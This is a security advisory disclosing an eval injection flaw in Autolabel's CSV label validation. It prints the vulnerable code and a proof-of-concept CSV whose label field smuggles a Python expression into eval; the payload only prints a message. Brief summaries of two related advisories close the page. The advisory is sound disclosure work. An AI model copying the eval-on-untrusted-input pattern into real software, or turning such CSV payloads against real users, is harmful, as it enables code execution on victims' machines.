Eval on CSV data allows arbitrary code execution in the MLCTaskValidate class
September 12, 2024

Products Impacted
This vulnerability is present in Autolabel v0.0.8 and newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Details
To exploit this vulnerability, an attacker would create a malicious CSV file and share the dataset with the victim to load it for a multilabel classification task using Autolabel. The vulnerability exists in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py Python file.
def validate(self, value: str):
if value.startswith("[") and value.endswith("]"):
try:
seed_labels = eval(value)
if not isinstance(seed_labels, list):
raise ValueError(
f"value: '{value}' is not a list of labels as expected"
)
unmatched_label = set(seed_labels) - self.labels_set
if len(unmatched_label) != 0:
raise ValueError(
f"labels: '{unmatched_label}' not in prompt/labels provided in config "
)
except SyntaxError:
raise
else:
# TODO: split by delimiter specified in config and validate each label
passWhen the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the MLCTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example configuration and an example of a malicious CSV are shown below:
from autolabel import AutolabelDataset
config = {
"task_name": "ToxicCommentClassification",
"task_type": "multilabel_classification", # classification task
"dataset": {
"label_column": "label",
},
"model": {
"provider": "openai",
"name": "gpt-3.5-turbo" # the model we want to use
},
"prompt": {
# very simple instructions for the LLM
"task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
"labels": [ # list of labels to choose from
"label",
"not toxic"
],
"example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
}
}
AutolabelDataset('example.csv', config, validate=True)example_config.py
example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]example.csv
Timeline
July, 8 2024 — Reached out to multiple administrators through their communication channel
September, 6 2024 — Final attempt to reach out to vendor prior to public disclosure date
September, 12 2024 — Public disclosure
Project URL
https://github.com/refuel-ai/autolabel
Researcher: Leo Ring, Security Research Intern, HiddenLayer
Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer
Related SAI Security Advisory
June 12, 2026
Post-Authentication RCE via update_collection
Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.
June 12, 2026
V1 API Tenant Isolation Bypass via Null Tenant/Database Context
All V1 collection-level endpoints pass None for tenant and database to the authorization layer, making tenant-scoped access control impossible through V1, regardless of which authorization provider is configured. V1 cannot be disabled. Combined with CVE-2026-45830, any authenticated user has unrestricted read/write access to any collection by UUID through V1 endpoints.